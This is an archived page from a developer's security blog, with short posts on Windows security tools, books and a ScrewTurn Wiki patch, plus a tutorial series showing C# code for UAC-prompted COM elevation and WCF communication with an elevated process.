<2017 March>
SunMonTueWedThuFriSat
2627281234
567891011
12131415161718
19202122232425
2627282930311
2345678

On this page...

Latest ProSafe VPN Firewall Client on x64
Crypto
Important Security Fix for ScrewTurn
XSS Detect Beta Code Analysis Tool
Really Simple Guestbook - With XLinq
Internet Explorer 7 Desktop Security Guide
Writing Secure Code for Windows Vista
Support? Not If You Evaluate the Product!
Internet Explorer Enhanced Security Configuration (IE ESC) & Windows Server 2008 ("Longhorn")
Stunnel / OpenSSL Notes
From the Useful Tools Department: Fiddler
Windows Vista Application Development Requirements for User Account Control Compatibility
UAC Elevation in Managed Code: Guidance for Implementing COM Elevation
UAC Elevation in Managed Code: A .NET COM Component Elevated
UAC Elevation in Managed Code: "Talking" to an Elevated Process via WCF
UAC Elevation in Managed Code: Starting Elevated COM Components
UAC Elevation in Managed Code: Starting Elevated Processes
Security for Applications in Windows Vista Forum
TweakUAC
Passing the News: Online Security Sessions from TechEd IT Forum Available
Vista Firewall
Microsoft Threat Analysis & Modeling v2.1
Spam in ASP.NET Viewstate?
Three Talks at Next Year's VSone Conference
Virtualization
Security Brief: Why won't my simple WCF service start when I run it as a non-administrator?
Windows Vista Security Guide
The Yearly MSDN Magazine Security Issue Has Landed
Advanced Code Access Security
How to Protect Insiders from Social Engineering Threats
Microsoft Threat Analysis & Modeling v2.0 RC2
UAC Prompts & Security
Preordered: The Security Development Lifecycle
Reporting Vulnerabilities is for the Brave
Microsoft Threat Analysis & Modeling v2.0 RC1
Webcast Scavenger Hunt
UAC Redirection 4 Fun & Profit
Security Technical Briefings
How Microsoft IT Does Threat Modeling
The Developer Highway Code
A Chronology of Data Breaches
Being Administrator Feels Great
Disable UAP
Web Server Fingerprinting
SSL Host Headers
Kernel-Mode SSL in IIS 6.0
Patterns & Practices Security Training Modules
The Code Room: Breaking Into Vegas
Professional ASP.NET 2.0 Security, Membership, and Role Management
Nmap 4 Released
Real Story of the Rogue Rootkit
Data-mining with SQL Injection and Inference
PDC05: Day Three, WE-SYP
PDC05: Attack and Defense: The Art of Secure Coding
Rant: Why make being secure so hard?
German MSDN Developer Center - Security Revamped
MSN Messenger Password Decrypter for Windows XP and 2003
ASP.NET 2.0 Security Practices at a Glance
The Hidden Boot Code of the Xbox or "How to fit three bugs in 512 bytes of security code"
Community-driven Security Conference in Vienna, Austria
NCC 2005 A
Adding auditing capabilities to SqlMembershipProvider
The 19 Deadly Sins of Software Security
Security Awareness Posters by Native Intelligence, Inc
10 Immutable Laws of Security
Upcoming book: ROOTKITS, Subverting the Windows Kernel
WEB428 @ TechEd Europe 2005
Microsoft Baseline Security Analyzer 2.0 Released
Securing Wireless LANs with PEAP and Passwords
Threat Modeling Web Applications Guidance
SQLRecon 1.0
MS IPsec "Portal"
Two more
Internet Security and Acceleration (ISA) Server 2004 Standard Edition Service Pack 1 (SP1)
Web Services Enhancements (WSE) 2.0 SP3
Speeding up Windows XP - done right
HttpOnly Cookies with ASP.NET 2.0
WASC Article: The 80/20 Rule for Web Application Security
Obtaining and Installing a WLAN Server Certificate for PEAP-MS-CHAP v2 Wireless Authentication
Two OS Security Applications: TrueCrypt and KeePass
Microsoft IT Attack and Penetration Testing Team
HOL: WSE 2.0 Security
Web Services Enhancements (WSE) 2.0 SP2 for Microsoft .NET
Windows Mobile Pocket PC Security
Browsing the Web and Reading E-mail Safely as an Administrator
MSDN Magazine November: Security
The Security Risk Managment Guide
IIS 6.0 vs Apache 2.0.x Security Defects
Making the ValidatePath HTTP Module easier to deploy
Samoa Project
Microsoft ASP.NET ValidatePath Module
Security bug in .NET Forms Authentication
OWASP .NET Projects
Excerpt of the book "Know Your Enemy: Learning About Security Threats"
Two of the most important security mailing lists
XSS Vulnerability in Newtelligence DasBlog
Hash Collision Q&A
Authentication and Access Control Diagnostics 1.0 (AuthDiag)
Interview with Bruce Schneier
"The .NET Developer's Guide to Windows Security" available online
Microsoft Baseline Security Analyzer v1.2.1
Michael Howard's Recommended Security Links
Web Security Threat Classification Whitepaper
Strider GhostBuster
Solutions @ a Glance
Search

Links

Member of...


ASP Insiders

MVP Visual Developer ASP/ASP.NET

Enter CodeZone

Blog Categories

Microsoft

Blogroll

Deutsche Resourcen

Management

Sign In
 

#  Wednesday, 19 November 2008

No, this time it is not Microsoft - it is NetGear that is not providing an x64-capable version of their software. The very latest VPN client software for a ProSafe router (FVS338) doesn't work (install) on Vista x64: 

I think it is needless to say that I am not amused. Who are you kidding in late 2008?

Categories: Security | this | x64
Wednesday, 19 November 2008 19:20:45 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Thursday, 01 May 2008

A friend of mine lent me his copy of Crypto (by Steven Levy) last week, today I got around to finish reading it (been pretty busy lately as you can tell from close to zero new posts on this blog).

What's especially interesting about this book is the history, the background. In the past, I have read a couple of technical-level books, even attended Crypto conference in Santa Barbara in 1997. What this book highlights are the connections between the acting persons (mathematicans may forgive me) as well as the whole shenanigans of trying to put the genie back in the bottle. I do remember some of those (PGP, low international key strengths, Clipper), but never read about them in such detail.

If you have some time to spare, definitely worth your time to understand how cryptography went public.

Categories: Books | Security
Thursday, 01 May 2008 16:18:27 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 08 February 2008

Yesterday, we found ourselves at the receiving end of an attack against one of our German Wikis that are running the ScrewTurn Wiki software. Turns out that it was a security issue even with the then latest version 2.0.23. Dario Solera - the maintainer of ScrewTurn - acted real fast when I informed him about the root cause of the attack and released v2.0.24 yesterday night.

Please download and upgrade immediately! The issue is being actively exploited (zero day if you so will).

Categories: ASP.NET | Security | this | Use the source Luke
Friday, 08 February 2008 07:54:08 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 02 November 2007

XSSDetect is a static code analysis tool that helps identify Cross-Site Scripting security flaws found within Web applications. It is able to scan compiled managed assemblies (C#, Visual Basic .NET, J#) and analyze dataflow paths from sources of user-controlled input to vulnerable outputs. It also detects whether proper encoding or filtering has been applied to the data and will ignore such "sanitized" paths. Download

Categories: .NET | ASP.NET | Security | Visual Studio
Friday, 02 November 2007 12:51:21 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Monday, 15 October 2007

Been on holidays, at conferences (eg last week Ask The Experts @ XTOPIA in Berlin), and worked on various projects - a couple of reasons it was rather quiet lately in this blog.

Yesterday I decided I needed a simple guestbook application for a to-be-developed private Web site, and because I didn't find anything that fit my needs I decided to write one myself with the goal of (ab)using XLinq in the course of this endeavour:

Guestbook_XLINQ.zip (7.09 KB)

Caveat emptor: I am no designer (surprise!). But thanks to no design it should be easy for you to add your own design. However, as this month's MSDN magazine is all about security, I decided to make the application production-ready security-wise. You'll find a lot of parsing plus XSRF protection (note: this version does not check for integer overflow in calculating the start row).

Missing features: this guestbook is not prepared for localization, nor does it use a control-based approach (where you drop those in your pages and get an in-place guestbook).

Update a version of this application for VS2008 RTM is available here.

Categories: 3.5 | ASP.NET | Security | Use the source Luke
Monday, 15 October 2007 09:56:36 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Friday, 10 August 2007
Version 2 of the IE7 Desktop Security Guide is available for download. If you are interested in locking down IE7, then you will need this document.
Categories: Administration | Security
Friday, 10 August 2007 09:55:34 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Monday, 06 August 2007

I set aside the entire day for reading the book Writing Secure Code for Windows Vista. And I was already able to put it back into the bookshelf thanks to its concise nature. The authors only tell the reader about "What's new and changed", without having people wade through tons of stuff they already know. I really greatly appreciate that the authors did not do a third edition of Writing Secure Code just for bringing developers up to speed on Vista security.

Hint to book publishers: other areas would also benefit from this approach. There is only so much time to read books, and I don't want to skim through information I already know. Please consider catering to non-noobs by offering more of these "What's new and changed" types of books to us old dogs.

PS: Way cool to be mentioned in a security book! (p27)

Categories: Books | Security
Monday, 06 August 2007 16:57:06 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Monday, 23 July 2007

I got myself an eval kit for RSA SecurID tokens to see how easy / hard this would be to deploy via AD. Well, I didn't get very far, that is, installation failed spectacularly in the early stages:

After this "helpful" message box setup decided to be more specific:

Ohh-Kay. Let's go to RSA and their support center (it takes roughly five clicks to get to online support, but that's another usability story) - sign in required. Hmmm. How about creating an account?

The eligibility is a real joke: "RSA customers who have a trial product (This does not include two user demos)". Excuse moi? On the Web site you told me that I was ordering a trial and in actuality it turned out to be a "2-User Promo Kit" (the moment I needed support I looked more closely on the package...) without support.

Maybe it's the Microsoft Windows Server 2003 R2 Enterprise Edition VHD I am using?

Categories: Administration | Security | this
Monday, 23 July 2007 20:54:49 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Monday, 25 June 2007

A default install of Windows Server 2003 ships with a locked-down Internet Explorer, in a so-called enhanced security configuration. Getting rid of it was done via configuring the Windows components. Not so on Windows Server 2008. At first of course I looked in all the wrong places (after all who reads a text they "know"?), until I found it in Server Manager:

You can turn it on / off separately for administrator or users:

Why did I turn it off? Because when it is on, you cannot view IIS7 FREB log files - the XSL has code in it that won't run in any browser but IE. At least at Beta 3 of Longhorn, that is.

Categories: IIS | Longhorn | Security
Monday, 25 June 2007 10:18:45 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]

 



#  Saturday, 02 June 2007

A couple of notes to self:

The latter is especially important if one fails to grasp how to turn the private key plus the certificate into the .pem for Stunnel. By the way, I was using CAcert. That works just fine for internal email servers.

Categories: Administration | Security | this
Saturday, 02 June 2007 17:22:41 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]

 



#  Wednesday, 28 February 2007

Fiddler is a HTTP debugging proxy. Although it is easy to use (a very good thing!), it is also very powerful. Point in case and why I am writing about it today is that I stumbled across a drive-by-download site (stumble is the wrong word, the URL came with what seemed like a phishing mail and that piqued my interest):

That site is actually quite clever though: when you go there the second time, it detects that it tried to infect you before and tells you that your IP is blocked. And it doesn't send a peep to a browser other than IE. Plus - and that takes the biscuit - it also verifies the referer.

But I still wanted the code, so I reset my router and started Fiddler:

Although Fiddler has tons more features, this did the trick for me in this case (if you want to learn what Fiddler can do, look here).

So what's the obfuscated script about? The short version: it is a variant of the ASUS download server drive-by download incident. The actual code can be found in a discussion on our German .NET community site here.

Categories: Cool Download | Security | this
Wednesday, 28 February 2007 15:26:38 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Wednesday, 21 February 2007

This is v2 of the Vista UAC development requirements document. From the TOC:

  • Why User Account Control?
  • How UAC Works
  • Will UAC Affect Your Application?
  • Designing Applications for Windows Vista
  • Deploying and Patching Applications for Standard Users
  • Troubleshooting Common Issues
  • References
Categories: Security | UAC | Vista
Wednesday, 21 February 2007 09:48:17 (W. Europe Standard Time, UTC+01:00)  #    Comments [0]

 



#  Friday, 16 February 2007

In my last blog entry UAC Elevation in Managed Code: A .NET COM Component Elevated I showed how to get up and running with an all-managed code solution for UAC and COM elevation. Today I want close out my series on UAC with some information on how to properly organize the project plus present a library you can reuse to get up and running quickly - without many of the manual and tedious steps from the previous proof of concept example.

Speaking of the previous sample: it is still the basis for this best practice, so the following directory layout will look familiar to you:

Before diving into code, I want to start out with the SampleSetup directory, which contains the executables. As you can guess, the starting point is Step1Register. It contains register.bat, which you have to execute:

Note that on machines without the .NET Framework SDK, there is no gacutil.exe. In that case, you have to drag & drop ManagedElevator.dll to c:\windows\assembly.

And in case you have been wondering from this screenshot, yes, the application now also plays nicely on Windows XP:

Of course, there is no consent UI popping up, nor is there a shield icon like there is on Windows Vista:

The magic for this cross-platform functionality is hidden in the UACHelper project - which brings us to the source section of this blog post:

All the necessary COM elevation magic is now moved to this neat little library - including the adapted UAC bits of VistaBridgeLibrary (no longer necessary). The names already give away the purpose of each class and where they are used:

  • COMRegistration Used by the elevated component to automatically register the necessary registry keys.
  • ShieldButton Used by the client to display a button with a shield icon (on Vista). For XP, no shield is rendered.
  • COMElevation Starts the requested component with admin privileges.
  • ElevatedProcess If you want to start a simple process elevated. Not used in this guidance.

The first customer of this library is the elevated component, so we start discussing this guy next:

At first glance, this is similar to the previous POC implementation. The main difference now is that I have broken down the functionality by feature area into namespaces:

  • The "main" namespace
  • The .Components namespace
  • The .Guids namespace
  • The .InterOp namespace

Let's look at these one by one.

The "main" namespace

Here, we have one class only:

class RegisterFunctions
{
  [ComRegisterFunction]
  public static void CustomRegister(Type t)
  {
    COMRegistration.RegisterForElevation(Assembly.GetExecutingAssembly().Location,
       SampleComponent.ClassToElevate,
       Global.AppId,
       100);

    // add additional "for elevation" components here by duplicating the above
  }

  [ComUnregisterFunction]
  public static void CustomUnregister(Type t)
  {
    COMRegistration.UnRegisterFromElevation(Assembly.GetExecutingAssembly().Location,
        Global.AppId);
  }
}

It is called when the assembly is regasm'ed, and it is here where you call into COMRegistration.RegisterForElevation to add all the necessary registry keys for elevation:

public static void RegisterForElevation(string assemblyLocation,
    string classToElevate,
    string appId,
    int localizedStringId)
{
 if (!UACHelperFunctions.IsUACEnabledOS()) return;

 // [HKEY_CLASSES_ROOT\CLSID\{71E050A7-AF7F-42dd-BE00-BF955DDD13D4}]
 // "AppID"="{75AB90B0-8B9C-45c9-AC55-C53A9D718E1A}"
 // "LocalizedString"="@E:\\Daten\\Firma\\Konferenzen und Talks\\..."
 RegistryKey classKey = Registry.ClassesRoot.OpenSubKey(@"CLSID\{" + classToElevate + "}", true);
 classKey.SetValue("AppId", "{" + appId + "}", RegistryValueKind.String);
 classKey.SetValue("LocalizedString", "@" + assemblyLocation + ",-" + localizedStringId.ToString(), RegistryValueKind.String);

 // [HKEY_CLASSES_ROOT\CLSID\{71E050A7-AF7F-42dd-BE00-BF955DDD13D4}\Elevation]
 // "Enabled"=dword:00000001
 RegistryKey elevationKey = classKey.CreateSubKey("Elevation");
 elevationKey.SetValue("Enabled", 1, RegistryValueKind.DWord);
 elevationKey.Close();

 classKey.Close();

 // [HKEY_CLASSES_ROOT\AppID\{75AB90B0-8B9C-45c9-AC55-C53A9D718E1A}]
 // @="ManagedElevator"
 // "DllSurrogate"=""
 RegistryKey hkcrappId = Registry.ClassesRoot.OpenSubKey("AppID", true);
 RegistryKey appIdKey = hkcrappId.CreateSubKey("{" + appId + "}");
 appIdKey.SetValue(null, Path.GetFileNameWithoutExtension(assemblyLocation));
 appIdKey.SetValue("DllSurrogate", "", RegistryValueKind.String);
 appIdKey.Close();

 // [HKEY_CLASSES_ROOT\AppID\ManagedElevator.dll]
 // "AppID"="{75AB90B0-8B9C-45c9-AC55-C53A9D718E1A}"
 RegistryKey asmKey = hkcrappId.CreateSubKey(Path.GetFileName(assemblyLocation));
 asmKey.SetValue("AppID", "{" + appId + "}", RegistryValueKind.String);
 asmKey.Close();

 hkcrappId.Close();
}

Please take note that when the component is registered on eg Windows XP, no registry entries are written. After all, they are not needed.

The .Components namespace

Not much of a change - it contains the administrative component(s).

The .Guids namespace

The guids have been moved to a separate namespace. The reason? That way you can reference the assembly in the client project and use the guids directly - no magic strings anywhere any more.

The .InterOp namespace

This is the most important change with regards to the POC project - defining the correct ComImport'ed interface is now the responsibility of the implementer of the elevated component. That way, anyone needing access to this component only needs to reference the assembly and they are good to go. It is a bad idea to have this interface part of the client codebase!

Speaking of the client... here is the button code for DemoForm.cs:

private void cmdLaunch_Click(object sender, EventArgs e)
{
 if (UACHelperFunctions.IsUACEnabledOS())
 {
   IHelloWorld ihw = COMElevation.Start<IHelloWorld>(
        SampleComponent.ClassToElevate, SampleComponent.IHelloWorld);
   ihw.SayHello();
   COMElevation.Release(ihw);
 }
 else
 {
   ManagedElevator.Components.ClassToElevate c = new ManagedElevator.Components.ClassToElevate();
   c.SayHello();
 }
}

What looks interesting at first is COMElevation.Start as well as Release:

public class COMElevation
{
 public static TIFace Start<TIFace>(string IID_Class, string IID_Interface)
 {
  return Start<TIFace>(new Guid(IID_Class), new Guid(IID_Interface));
 }

 public static TIFace Start<TIFace>(Guid IID_Class, Guid IID_Interface)
 {
  object o = UACManager.LaunchElevatedCOMObject(IID_Class, IID_Interface);
  return (TIFace)o;
 }

 public static void Release(object o)
 {
  Marshal.ReleaseComObject(o);
 }
}

Actually all it does is encapsulate the necessary calls to UACManager and Marshal. Why is there no if / else using IsUACEnabledOS here? Well, at first I thought I'd build such a switch, but then I thought again: why would I use COM InterOp if I don't have to? I already referenced the assembly for the component (for the guids and interop interface), so why not use managed all the way and save time? That's what I did in the cmdLaunch_Click event handler.

That's it for the code folks, now a little discussion at the end on why in the world would you even think about doing this in a cross-platform way, or why it is a stupid idea all along:

This approach is only sensible if your application runs as administrative user on XP, otherwise all the calls in the administrative component will fail. However, the cross-platform part is only there to make it a complete best practice, there is no "you must use it cross-platform" - if you build applications for Windows Vista with the eventual need to elevate a task, then UACHelper is definitely for you! (and forget about that it would even work on XP)

Oh, and I almost forgot - here is the complete download, source code included of course (my code is BSD licensed):

AutomaticRegistration.zip (91.92 KB)

Categories: Security | UAC | Use the source Luke | Vista
Friday, 16 February 2007 08:02:29 (W. Europe Standard Time, UTC+01:00)  #    Comments [1]

 



#  Monday, 05 February 2007

I admit it: UAC Elevation in Managed Code: "Talking" to an Elevated Process via WCF is a kludge. The reason why I dabbled with this approach at all is that I failed to implement COM elevation with managed code (not elevating a COM component, but the COM component itself). However, at long last, I succeeded in that respect too: I now present you the all-managed code solution to UAC elevation!

Once again I built myself a small demo frontend application:

As you can guess, the first button does plain vanilla COM InterOp without any UAC elevation. Thus its code is rather simple:

private void simpleCallButton_Click(object sender, EventArgs e)
{
  Type t = Type.GetTypeFromCLSID(new Guid("71E050A7-AF7F-42dd-BE00-BF955DDD13D4"));
  object o = Activator.CreateInstance(t);
  t.InvokeMember("SayHello", BindingFlags.InvokeMethod, null, o, null);
}

Why this reflection magic? Well, the COM component I am calling here is implemented in .NET - and both VS as well as tlbimp balk at reimporting the exported type library.

The COM component in question has been regasm'ed & gacutil'ed (ManagedElevator project in the download). Although the name implies that I am after elevation, it is pretty much a standard COM component written using C#:

public class TheGuids
{
  public const string IHelloWorld = "B8CD5C09-9ACD-49b0-BF6F-C7B0F29795F9";
  public const string ClassToElevate = "71E050A7-AF7F-42dd-BE00-BF955DDD13D4";
  public const string AppId = "75AB90B0-8B9C-45c9-AC55-C53A9D718E1A";
}

[Guid(TheGuids.IHelloWorld)]
[InterfaceType(ComInterfaceType.InterfaceIsDual)]
public interface IHelloWorld
{
  [ComVisible(true)]
  void SayHello();
}

[Guid(TheGuids.ClassToElevate)]
[ClassInterface(ClassInterfaceType.None)]
public class ClassToElevate : IHelloWorld
{
 public ClassToElevate()
 {
 }

 [ComVisible(true)]
 public void SayHello()
 {
  MessageBox.Show("Hello World");
 }
}

So how do you go from "standard" "plain-vanilla" COM component to COM elevation? The part that stumped me for so long was the ClassInterface attribute - if you forget this guy, you'll end up with an InvalidCastException thrown by UACManager.LaunchElevatedCOMObject.

But that's not quite all to get up and running with COM elevation: in addition, you need to modify the default registration for this component - specifically, you need to configure the DllSurrogate. This is where the AppId GUID comes into play: it isn't used in code (kept there for documentation purposes only), but in registryadditions.reg. It binds the various registry keys. And speaking of this .reg file, please take note of the LocalizedString value: it contains the text for the UAC prompt (also check out UACPrompts.rc, resource.h, compilerc.bat as well as the properties of the ManagedElevator project where the compiled .res file is referenced).

Note Before importing the .reg file into the registry make sure to fix the file path contained in LocalizedString! And if you create your own elevated COM component DO NOT reuse any of my three GUIDs - use guidgen.exe to create your personal ones.

From there, UAC elevation is smooth sailing. The Reflection version of COM elevation looks very similar to non-elevated calls:

private void managedElevation_Click(object sender, EventArgs e)
{
  // CLSID
  Guid classId = new Guid("71E050A7-AF7F-42dd-BE00-BF955DDD13D4");

  // Interface ID
  Guid interfaceId = new Guid("B8CD5C09-9ACD-49b0-BF6F-C7B0F29795F9");

  object o = UACManager.LaunchElevatedCOMObject(classId, interfaceId);

  Type t = o.GetType();
  t.InvokeMember("SayHello", BindingFlags.InvokeMethod, null, o, null);

  Marshal.ReleaseComObject(o);
}

Of course this is not really a good solution (late binding). So instead I manually imported the IHelloWorld interface:

[
ComImport(),
Guid("B8CD5C09-9ACD-49b0-BF6F-C7B0F29795F9"),
InterfaceType(ComInterfaceType.InterfaceIsDual)
]
  interface IHelloWorld
  {
   [
   MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime),
   PreserveSig
   ]
    void SayHello();
  }

Which makes calls into the elevated COM object much easier and cleaner:

private void managedElevationInterface_Click(object sender, EventArgs e)
{
  Guid classId = new Guid("71E050A7-AF7F-42dd-BE00-BF955DDD13D4");
  Guid interfaceId = new Guid("B8CD5C09-9ACD-49b0-BF6F-C7B0F29795F9");

  object o = UACManager.LaunchElevatedCOMObject(classId, interfaceId);

  IHelloWorld ihw = (IHelloWorld)o;
  ihw.SayHello();

  Marshal.ReleaseComObject(o);
}

So why should you use the COM elevation solution instead of starting the process? Well, there are a couple of reasons:

  • You can package more than one component into a DLL and still have custom UAC prompts thanks to LocalizedString
  • Your users don't get "an unidentified program..." warnings. Thank you COM registration
  • If you ever need to talk more extensively with the elevated process then this approach can be adapted more easily

The source code

ConsumeMyElevatedCOM.zip (97.56 KB)

You will find a file aptly named notes.txt in the ManagedElevator project that describes all the necessary steps to get up and running.

I hope you find this sample useful and not have to spend as much time as I did. Cheers!

Categories: .NET | Security | UAC | Vista
Monday, 05 February 2007 22:41:46 (W. Europe Standard Time, UTC+01:00)  #    Comments [7]

 



#  Sunday, 04 February 2007

In the blog post UAC Elevation in Managed Code: Starting Elevated Processes I talked about how to start an elevated process. However, just starting a process might not cut the mustard, for example if you need to hand over data to the elevated process. You could achieve this by passing, let's say, some data as command line arguments to ProcessInfo before starting the elevated process. But that seriously limits communication.

So how can you perform communication with an elevated process? My first idea was to use .NET Remoting. Once I thought through the multi-instance scenario, I quickly realized that this meant the server had to be running in the non-elevated application, because only it could properly choose a port. And because I am not a fan of Remoting anyways, I decided to give WCF (Windows Communication Foundation, a pillar of .NET 3.0) a try.

It looked like smooth sailing at first, but then I realized that with WCF too I needed to implement the service inside the non-elevated application. This time, however, the reason was "How do I know when the elevated application has initialized before I can actually start communicating with it?". Back to the drawing board.

The final solution now looks like this: the non-elevated application starts a service. The operations contract specifies a callback, which, once the elevated application has signalled its readiness, can be used by the non-elevated application to "talk" with the elevated application. I didn't intend to go duplex, but hey, if there's no other way I am willing to take plunge. Speaking of tricks of the trade: I am using imperative binding to a named pipe. Reason? Well, WS bindings won't work (see here and here), and the TCP channel would pop up a firewall warning. That's why.

Let's look at the applications - first the non-elevated one:

This time I forfeited eye candy (the shield button). Same (missing eye candy) goes for the elevated application as it is a console application only:

Solution-wise, this simple two-application scenario is split into four projects:

So where do we start? With the easy part inside ElevationContract:

[ServiceContract(Namespace = "http://Christoph.Wille.Samples",
CallbackContract = typeof(IElevatedProcess))]
public interface IWaitForElevatedProcess
{
  [OperationContract(IsOneWay = false)]
  void ElevatedProcessStarted();
}

[ServiceContract(Namespace = "http://Christoph.Wille.Samples")]
public interface IElevatedProcess
{
  [OperationContract(IsOneWay = false)]
  void SayHello(string message);
}

The interface IWaitForElevatedProcess is implemented in StandardUserApp. It is the service endpoint that is initialized before the elevated process is started - and once the elevated application is up and running, it calls into ElevatedProcessStarted. And we are in business for using the IElevatedProcess callback that is implemented in the ElevatedProcess console application.

So how is the service endpoint intialized - let's take a look inside:

private const string theProcess = @"..\..\..\ElevatedProcess\bin\Debug\ElevatedProcess.exe";

private void tryitButton_Click(object sender, EventArgs e)
{
  string channelIdentifier = MiscHelpers.CreateRandomString(64);
  MyUACServiceHost.StartService(channelIdentifier);

  // starting it modal doesn't work (obviously - unless we have more threads, of course)
  ElevatedProcess.Start(theProcess, channelIdentifier);
}

Interesting tidbit #1 is CreateRandomString: it creates a random string to use for the address. Why? Well, if multiple instances of our application are running and trying to elevate a process, we are in trouble. Which brings me to StartService:

internal static void StartService(string pipeEndPoint)
{
  NetNamedPipeBinding binding = new NetNamedPipeBinding();
  binding.Name = "uacbinding";
  binding.Security.Mode = NetNamedPipeSecurityMode.Transport;

  Uri baseAddress = new Uri("net.pipe://localhost/uac/" + pipeEndPoint);

  myServiceHost = new ServiceHost(typeof(SampleService), baseAddress);
  myServiceHost.AddServiceEndpoint(typeof(IWaitForElevatedProcess), binding, baseAddress);
  myServiceHost.Open();
}

As I said before, I am doing it imperatively (no configuration in app.config necessary). That's all there is to getting the service up and running.

Now let's switch to the console application's Main method:

static void Main(string[] args)
{
  if (args.Length != 1)
  {
    Console.WriteLine("One argument expected - the channel identifier");
    return;
  }

  NetNamedPipeBinding binding = new NetNamedPipeBinding();
  binding.Name = "uacbinding";
  binding.Security.Mode = NetNamedPipeSecurityMode.Transport;

  String url = "net.pipe://localhost/uac/" + args[0];
  EndpointAddress address = new EndpointAddress(url);

  WaitForElevatedProcess client = new WaitForElevatedProcess(
      new InstanceContext(new SampleCallback()),
      binding,
      address);

  client.ElevatedProcessStarted();

  Console.WriteLine("The elevated process is now ready");
  Console.ReadLine();

  client.Close();
}

Similar to normal client WCF code, however, with the duplex twist hidden inside WaitForElevatedProcess:

public class WaitForElevatedProcess : DuplexClientBase<IWaitForElevatedProcess>, IWaitForElevatedProcess
{
  public WaitForElevatedProcess(System.ServiceModel.InstanceContext callbackInstance,
 
    System.ServiceModel.Channels.Binding binding,
    System.ServiceModel.EndpointAddress remoteAddress)
       : base(callbackInstance, binding, remoteAddress)
  {
  }

  public void ElevatedProcessStarted()
  {
    base.Channel.ElevatedProcessStarted();
  }
}

Once the channel is connected, this elevated process calls back into the service piece which lives in the non-elevated application, namely SampleService:

[ServiceBehavior(ConcurrencyMode = ConcurrencyMode.Reentrant,
      InstanceContextMode = InstanceContextMode.PerSession)]
public class SampleService : IWaitForElevatedProcess
{
  public void ElevatedProcessStarted()
  {
    OperationContext.Current.GetCallbackChannel<IElevatedProcess>().SayHello("Chris");
  }
}

This method is the workhorse where I can talk to the elevated process - if only my callback interface had more as well as more serious methods ;-)

Speaking of talking, I owe you the code for the callee in the console application:

[CallbackBehavior(ConcurrencyMode = ConcurrencyMode.Reentrant)]
public class SampleCallback : IElevatedProcess
{
  public void SayHello(string message)
  {
    Console.WriteLine("Hello world " + message);
  }
}

That's it - to recap: first, we initialize the WCF service. Then elevate a process. This process, once initialized, calls into our service and leaves a callback. And then we are in business talking to the elevated process (setting data, being notified when the elevated application quits and why, ...).

Sample warnings before you download: MyUACServiceHost definitely should be instance instead of static. And, more restricting - starting the elevated process modal won't allow communication unless you start the service on a separate thread. For simplicity reasons I didn't do this for the POC.

ElevateProcessTalkWCF.zip (27 KB)

Before concluding I wanted to add a few words: my ideal implementation for UAC would be COM elevation. That way, one can put more than one component into a single DLL, and still get a meaningful UAC prompt thanks to the LocalizedString registry key - which is per component, and not per executable (which is the case for this solution if you add multiple actions). If you need differing prompts for each administrative action, there is only one course of action you can take with processes: create multiple executables. Not very pretty, but I failed with writing an elevatable (not a word, I am sure) managed (C#) COM component.

Categories: .NET | 3.0 | Security | UAC | Vista | WCF
Sunday, 04 February 2007 22:23:45 (W. Europe Standard Time, UTC+01:00)  #    Comments [3]

 



#  Tuesday, 30 January 2007

The previous installment UAC Elevation in Managed Code: Starting Elevated Processes dealt with starting executables with the "real" administrative token. In this blog post, we deal with starting a COM component with elevated privileges. For in-depth background information, please consult Kenny Kerr's absolutely excellent post on Windows Vista for Developers – Part 4 – User Account Control.

To start with, we need a COM component. Instead of writing an ATL C++ COM component from scratch, I took the MyElevateCom sample from CoCreateInstanceAsAdmin or CreateElevatedComObject sample from the Vista Compatibility Team Blog. Note that for building it, check out my post Visual Studio on Vista: Not so Fast!

Assuming that you built and successfully registered the COM component (it is built to the instuctions from Kenny's post), you can go about and write the managed caller. First, we need a reference to the component:

Then comes the tricky part - actually instantiating the COM component. When you take a look at the C++ example, you see that quite some "moniker magic" is involved that cannot be replicated by simply newing up the component. So how to mimic this behavior in managed code? The Microsoft® Windows® Software Development Kit for Windows Vista™ and .NET Framework 3.0 Runtime Components comes to the rescue: inside, you find C:\Program Files\Microsoft SDKs\Windows\v6.0\Samples\CrossTechnologySamples.zip, which contains the VistaBridge sample.

From that, I took the VistaBridgeLibary, and modified the static UACManager.LaunchElevatedCOMObject method a bit:

[return: MarshalAs(UnmanagedType.Interface)]
public static object LaunchElevatedCOMObject(Guid Clsid, Guid InterfaceID)
{
  string CLSID = Clsid.ToString("B");
  string monikerName = "Elevation:Administrator!new:" + CLSID;

  NativeMethods.BIND_OPTS3 bo = new NativeMethods.BIND_OPTS3();
  bo.cbStruct = (uint)Marshal.SizeOf(bo);
  bo.hwnd = IntPtr.Zero;
  bo.dwClassContext = (int)NativeMethods.CLSCTX.CLSCTX_LOCAL_SERVER;

  object retVal = UnsafeNativeMethods.CoGetObject(monikerName, ref bo, InterfaceID);

  return (retVal);
}

Modifications: the method is now public instead of internal, and CLSCTX changed to local server (otherwise it wouldn't work).

Next, we need a UI:

This button is the CommandLinkWinForms control from VistaBridgeLibary, with the ShieldIcon property set to true.

Let's hook up the event code:

private void tryItButton_Click(object sender, EventArgs e)
{
 Guid IID_ITheElevated =
  new Guid(0x5EFC3EFB, 0xC7D3, 0x4D00, 0xB7, 0x2E, 0x2F, 0x86, 0x4A, 0x1E, 0xAD, 0x06);

 Guid CLSID_TheElevated =
  new Guid(0x253E7696, 0xA524, 0x4E49, 0x9E, 0x50, 0xBF, 0xCC, 0x29, 0x91, 0x31, 0x23);

 object o = UACManager.LaunchElevatedCOMObject(CLSID_TheElevated, IID_ITheElevated);

 ITheElevated iface = (ITheElevated)o;

 // Call the method on the interface just like in the C++ example
 iface.ShowMe();

 // Release the object
 Marshal.ReleaseComObject(o);
}

